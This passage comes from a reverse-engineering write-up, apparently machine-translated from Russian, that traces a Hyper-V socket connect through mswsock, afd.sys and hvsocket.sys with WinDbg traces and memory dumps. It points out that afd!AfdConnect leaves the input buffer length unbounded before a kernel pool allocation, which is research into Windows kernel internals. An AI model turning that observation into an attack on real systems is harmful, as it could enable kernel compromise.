<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG InputBufferLength,0xС</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PVOID OutputBuffer, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG OutputBufferLength 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><ol start="5" style="margin-bottom: 0pt; margin-top: 0pt;"><ol start="5" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: decimal; margin-left: -36pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Connect</span></div>
</li>
</ol>
</ol>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The server is ready to accept incoming connections so now we will consider </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">connect</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> call which is carried out from the client. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">From ClientExample!Connect ws2_32 call! Prolog_v2 goes, then ws2_32!WahReferenceContextByHandle (as a descriptor it is transferred 144 - handle \Device\Afd). Further is caused</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> mswsock!WSPConnect</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, from which </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">mswsock! SockDoConnect</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, further </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">mswsock! SOCK_SQM_INFO_CAPTURE __ NonCore_WSAConnect</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, then </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">wshhyperv! WSHGetWildcardSockaddr </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(returns wshhyperv! HV_GUID_ZERO), then mswsock! WSPBind from where is caused wshhyperv!WSHGetSockaddrType</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>k – bind from connect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ChildEBP RetAddr </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0036f478 7203873c ntdll!NtDeviceIoControlFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0036f530 7204dab6 mswsock!WSPBind+0x1cc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0036f5c0 7204e3af mswsock!SockDoConnect+0x2c0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0036f5dc 75de4d76 mswsock!WSPConnect+0x1f</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0036f62c 002611df WS2_32!connect+0x86</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">В input buffer до вызова NtDeviceIOControlFile (с IOCTL 12003) из mswsock!WSPBind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Value of input buffer to NtDeviceIOControlFile call (with IOCTL 12003) from mswsock!WSPBind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc 007D4930 007D4930+28</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">007d4930 00000002 baad0022 00000000 00000000 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">007d4940 00000000 00000000 00000000 00000000 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">007d4950 00000000 00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Input buffer after call:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc 007D4930 007D4930+24</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">007d4930 00000022 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">90db8b89 4f790d35 ea49e98c</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> - </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_CHILDREN</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">007d4940 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">cdb7c80a</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 00000000 00000000 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">007d4950 00000000 00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Returns from mswsock!WSPBind</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> mswsock!SockDoConnectReal</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, from which </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ntdll!NtDeviceIoControlFile </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">is caused </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS WINAPI NtDeviceIoControlFile(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE FileHandle, - 144 File (---) \Device\Afd)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE Event, - 140 (Event)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PIO_APC_ROUTINE ApcRoutine, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID ApcContext, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PIO_STATUS_BLOCK IoStatusBlock, 0036F4C0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG IoControlCode, 00012007 (afd!AfdConnect)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID InputBuffer, </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0036F4E8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG InputBufferLength,30</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PVOID OutputBuffer, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG OutputBufferLength 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0:000> k</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># ChildEBP RetAddr </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 00cff670 7232df2b ntdll!NtDeviceIoControlFile</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 00cff724 7232dc08 mswsock!SockDoConnectReal+0x2c6</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 00cff7b0 7232e3af mswsock!SockDoConnect+0x412</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 00cff7cc 75ae4d76 mswsock!WSPConnect+0x1f</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 00cff81c 009711df WS2_32!connect+0x86</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd 0036F4E8 0036F4E8+30</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0036f4e8 007d4800 00000000 007e1270 00000022</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0036f4f8 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">a42e7cda 480cd03f dea4c29c 78b8ab20</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0036f508 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">b1d00d3e 4570fe10 487662ad 1b7a9d77</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dtx _GUID 0036F4E8+10</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(*((_GUID *)0x36f4f8)) : {A42E7CDA-D03F-480C-9CC2-A4DE20ABB878} [Type: _GUID] - </span><span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_PARENT</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [<Raw View>] [Type: _GUID]</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dtx _GUID 0036F4E8+20</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(*((_GUID *)0x36f508)) : {B1D00D3E-FE10-4570-AD62-7648779D7A1B} [Type: _GUID] – GUID of our service.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [<Raw View>] [Type: _GUID]</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We pass into a kernel in the afd!AfdConnect function. At first there is a check whether service from 32-bit process, or 64-bit was caused (nt!IoIs32bitProcess). Then the size of transferred buffer (since 0x22) is compared to AfdStandardAddressLength (equal 1Ch), the size of this structure is equal 24h therefore there is an allocation of a pool (ExAllocatePoolWithTagPriority) in 24h byte and copying to it the transferred buffer. What is interesting, the upper bound of InputBufferLength is not controlled in any way, and from usermode we can give any size of the buffer, which behind a deduction 0xC, will be transferred to the nt!ExAllocatePoolWithTagPriority function.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further SOCKADDR_SIZE is called - function which on the basis of number of the protocol receives size of socket of the address from the array:</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="40" src="https://lh3.googleusercontent.com/cZxbW6FsKM07T4Q2CDYSWzqIg1aI2nuKxx0PMRnZ99f-idLAT1DRLLDSOTp-RqaDRRJHnZZ0tBGFELnOxaYCCPscBYrObWL_C7rsOlyl30MBP34jrKn-Lblk6mRcCiqPwl-SN_IR_55gw7ueLQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="453" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further after numerous checks afd!AfdCreateConnection is caused (in rcx pointer on element of structure afd! AfdTlTransportListHead). The quantity of elements of such structure can be seen through WinDBG mex expansion (if there is no desire to bother with team! list)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!mex.foreachitem afd!AfdTlTransportListHead -c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff80535407530</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffc80e74a37bf0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffc80e74814b10</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffc80e742a9400</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffc80e742a9320</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Processed 5 items.</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">From it nt!PsChargeProcessPoolQuota is caused in which there is a work with the PplConnectionPool variable. Further the 100h-sized area of memory is nullified, ExpInterlockedPopEntrySList is caused - the new structure of _AFD_CONNECTION begins to be formed, in the field "type" writes 0xAFD8. Further afd!AfdTimerWheelInitializeEntry, then nt!ObfReferenceObject, where as an object - ClientExample.exe process. Afd!AfdReceiveWindowSize and afd!AfdSendWindowSize are loaded respectively in +90h and +94h offsets of structure. There is a check of esi (the 3rd AfdCreateConnection parameter is loaded there) if it is equal 0, then nt!IoCreateFile is caused, however is equal in our case to 1. We return from afd!AfdCreateConnection. afd!AfdAddConnectedReference is caused (the 1st parameter pointer to _AFD_CONNECTION) – 16th bit of this structure set to 1 and increases on 1 48th bit, then afd!AfdEnableFailedConnectEvent is called (it is dumped 3ch+8 bit and DWORD on offset 18Ch the same structure is nullified). Further afd!AfdGetEndpointConnectDispatch (returns or the address of the afd!AfdTlClientConnectDispatch procedure, or if the 7th byte of _AFD_CONNECTION is equal 10h, then AfdRioTlClientConnectDispatch returns) and afd!AfdRefTLBaseEndpoint are carried out. </span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTIProviderConnect</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> is caused. Inside hvsocket!VmbusTlEndpointIsPrivileged and hvsocket!VmbusTlValidateSockAddress are caused (the structure from two GUID, specified in socket parameters from the ClientExample appendix is transferred to rdx, check correctness of Address Family value - 0x22 and the transferred GUID is checked whether the hvsocket!VmbusTlIsServiceEnabled service is created). Hvsocket!VmbusTlFindOrCreateService is caused from hvsocket!VmbusTlIsServiceEnabled and make search of GUID in list, created by services values from registry</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!mex.foreachitem @rdx -x "dt nt!_GUID @#Item+10"</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Item #1 @ 0xffffaf89af0af750</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {999e53d4-3d5c-4c3e-8779-bed06ec056e1}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Item #2 @ 0xffffaf89adac0200</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
